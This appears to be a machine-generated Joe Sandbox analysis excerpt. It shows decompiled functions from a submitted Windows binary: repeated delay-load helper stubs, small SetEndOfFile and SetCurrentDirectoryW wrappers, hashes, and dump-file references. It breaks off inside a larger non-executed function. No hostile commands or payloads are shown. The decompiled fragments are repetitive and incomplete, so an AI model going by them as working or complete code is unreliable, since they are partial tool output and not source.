0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c147872a019a9f5ac70437715fbc168f8b16f9fcf870928054cf1a8b188524ad
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: c147872a019a9f5ac70437715fbc168f8b16f9fcf870928054cf1a8b188524ad
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DC18 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DC18() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 876852433e72ecedcf3a69846406fc689b671e758be53c6096c30049b4956aab
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: 876852433e72ecedcf3a69846406fc689b671e758be53c6096c30049b4956aab
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DDC3 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DDC3() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bde4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7dd74
0x00e7dd79
0x00e7dd80

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DD79

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1561bc8e9f77a1108ec3b03b681b031d68bcf17b197089731285e314f6938c4f
Instruction ID: 6334608d8e16c0644a826ed425aa42beae31e9168df80a46ed16e33c8b9ce9ef
Opcode Fuzzy Hash: 1561bc8e9f77a1108ec3b03b681b031d68bcf17b197089731285e314f6938c4f
Instruction Fuzzy Hash: 76A001DA2AD642BC35186292BE46C7A026CC8C8B71331FA9EB50AF4192A9842C461431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DDAF Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DDAF() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bde4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7dd74
0x00e7dd79
0x00e7dd80

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DD79

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0958b5fd72321196fde91f67a8397be71892b790611c7f27c46ce66900c62f86
Instruction ID: 6334608d8e16c0644a826ed425aa42beae31e9168df80a46ed16e33c8b9ce9ef
Opcode Fuzzy Hash: 0958b5fd72321196fde91f67a8397be71892b790611c7f27c46ce66900c62f86
Instruction Fuzzy Hash: 76A001DA2AD642BC35186292BE46C7A026CC8C8B71331FA9EB50AF4192A9842C461431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DDB9 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DDB9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bde4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7dd74
0x00e7dd79
0x00e7dd80

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DD79

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3fabc071cf5a5798c324ae3b1e0d962c395a931d8578bd6ef83cd711b317b968
Instruction ID: 6334608d8e16c0644a826ed425aa42beae31e9168df80a46ed16e33c8b9ce9ef
Opcode Fuzzy Hash: 3fabc071cf5a5798c324ae3b1e0d962c395a931d8578bd6ef83cd711b317b968
Instruction Fuzzy Hash: 76A001DA2AD642BC35186292BE46C7A026CC8C8B71331FA9EB50AF4192A9842C461431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DD87 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DD87() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bde4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7dd74
0x00e7dd79
0x00e7dd80

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DD79

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 82eb8c46e54d770cb2dc370d2075e1a168b03229198e78973eb49d1fbf374cf0
Instruction ID: 6334608d8e16c0644a826ed425aa42beae31e9168df80a46ed16e33c8b9ce9ef
Opcode Fuzzy Hash: 82eb8c46e54d770cb2dc370d2075e1a168b03229198e78973eb49d1fbf374cf0
Instruction Fuzzy Hash: 76A001DA2AD642BC35186292BE46C7A026CC8C8B71331FA9EB50AF4192A9842C461431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DD91 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DD91() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bde4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7dd74
0x00e7dd79
0x00e7dd80

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DD79

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 086fae1b90ba99f2179b9a6e41f88320787063ab76eb329b721ea6d14e29923a
Instruction ID: 6334608d8e16c0644a826ed425aa42beae31e9168df80a46ed16e33c8b9ce9ef
Opcode Fuzzy Hash: 086fae1b90ba99f2179b9a6e41f88320787063ab76eb329b721ea6d14e29923a
Instruction Fuzzy Hash: 76A001DA2AD642BC35186292BE46C7A026CC8C8B71331FA9EB50AF4192A9842C461431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DD6C Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DD6C() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bde4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7dd74
0x00e7dd79
0x00e7dd80

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DD79

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dc90caaaaca14b92fe7f12bae7d1f2f8917c9434e604265959f1e939dd6bf43e
Instruction ID: c6097631dfbc0620049c5acd37e989b11414bcab96ed6d25b3fc7097a48dc144
Opcode Fuzzy Hash: dc90caaaaca14b92fe7f12bae7d1f2f8917c9434e604265959f1e939dd6bf43e
Instruction Fuzzy Hash: 85A001DA2A96427C391862A2BE96C7A026CC8C4B31331FA9EB509F4192E9842C461431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DED2 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DED2() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9be44); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7de97
0x00e7de9c
0x00e7dea3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DE9C

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6c1b37940dd35861659bd3c4e8f8c68415e2c2103b053041d4745b03ea3ea13b
Instruction ID: b53a5963030c2e88b3a0495ce02677889579548d122f110824245cfc90d83a6c
Opcode Fuzzy Hash: 6c1b37940dd35861659bd3c4e8f8c68415e2c2103b053041d4745b03ea3ea13b
Instruction Fuzzy Hash: 20A011823AE202BC300822803E0BCBA022CC8C8B20330F80EB00AB8282AA802C020032

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DEBE Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DEBE() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9be44); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7de97
0x00e7de9c
0x00e7dea3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DE9C

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2b3611abb385263a704bbfbfd4be61c92383ddcb58b41232e2a846758e39d1e6
Instruction ID: b53a5963030c2e88b3a0495ce02677889579548d122f110824245cfc90d83a6c
Opcode Fuzzy Hash: 2b3611abb385263a704bbfbfd4be61c92383ddcb58b41232e2a846758e39d1e6
Instruction Fuzzy Hash: 20A011823AE202BC300822803E0BCBA022CC8C8B20330F80EB00AB8282AA802C020032

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DF15 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DF15() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9be64); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7def8
0x00e7defd
0x00e7df04

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DEFD

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e7b69ca4b032313109b4e0f7a14cab2861a979046c557354d18ff4b727784232
Instruction ID: e739e6c0bb8b3138514fc196c9f67f834aee0e80f4ccfed0e20a6ed8c45419a5
Opcode Fuzzy Hash: e7b69ca4b032313109b4e0f7a14cab2861a979046c557354d18ff4b727784232
Instruction Fuzzy Hash: E0A00196AAD246BD75496291BE46CBA026CC8E8B61331F95EB50AB85A2AA802D461031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DE01 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DE01() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9be24); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7de04
0x00e7de09
0x00e7de10

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DE09

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f48984b8d3b75545dd6a3bf9eab9f70f73aac63d268e76e0726186b8ee45446b
Instruction ID: 88dd572e92ffd24b167f4a48525fc222d90e4d1976a8fa5353161c7f612911cc
Opcode Fuzzy Hash: f48984b8d3b75545dd6a3bf9eab9f70f73aac63d268e76e0726186b8ee45446b
Instruction Fuzzy Hash: 49A002D67A96467D350863917E47C7B03ACC4C4F21331F95EF604F4196AA802C460031

Uniqueness

Uniqueness Score: -1.00%

Function 00E6A05F Relevance: 1.5, APIs: 1, Instructions: 7
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E6A05F(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}

0x00e6a062
0x00e6a06b
0x00e6a06e

APIs

SetEndOfFile.KERNELBASE(?,00E69295,?,?,-00001964), ref: 00E6A062

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: a2c6fd02f63b8c2d3d5e040c403c0888ee2ad76ab667c5b073d700b45f30d816
Instruction ID: 2a9b8e3802bd354131044ff1bee7dab82372c7397b4ba9ac802c88b2ffa70aa6
Opcode Fuzzy Hash: a2c6fd02f63b8c2d3d5e040c403c0888ee2ad76ab667c5b073d700b45f30d816
Instruction Fuzzy Hash: 4BB011300A000A8A8E002B32CC088283A20EB2230A30082A2A002CA0A0CB22C02AAA00

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A5B3 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7A5B3(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}

0x00e7a5b7
0x00e7a5bf
0x00e7a5c3

APIs

SetCurrentDirectoryW.KERNELBASE(?,00E7A817,C:\Users\user\Desktop,00000000,00EA946A,00000006), ref: 00E7A5B7

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 5429b17946dc20ae623c10f24dfd72b5a8573cba197b4d3e57875cf02c012e54
Instruction ID: 330418b23ee53b07fcd9c509674fec619df6449d05afe4fc16f770a0f5949b8f
Opcode Fuzzy Hash: 5429b17946dc20ae623c10f24dfd72b5a8573cba197b4d3e57875cf02c012e54
Instruction Fuzzy Hash: 5FA012301950065A8A000B31CC09C15B6505760702F0086237002C00B0CB308C18A500

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E7BB70 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00E7BB70(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				struct HWND__* _t160;
				intOrPtr _t163;
				void* _t164;
				int _t167;
				int _t170;
				void* _t175;
				void* _t177;

				_t157 = __edx;
				_t152 = __ecx;
				E00E7E630();
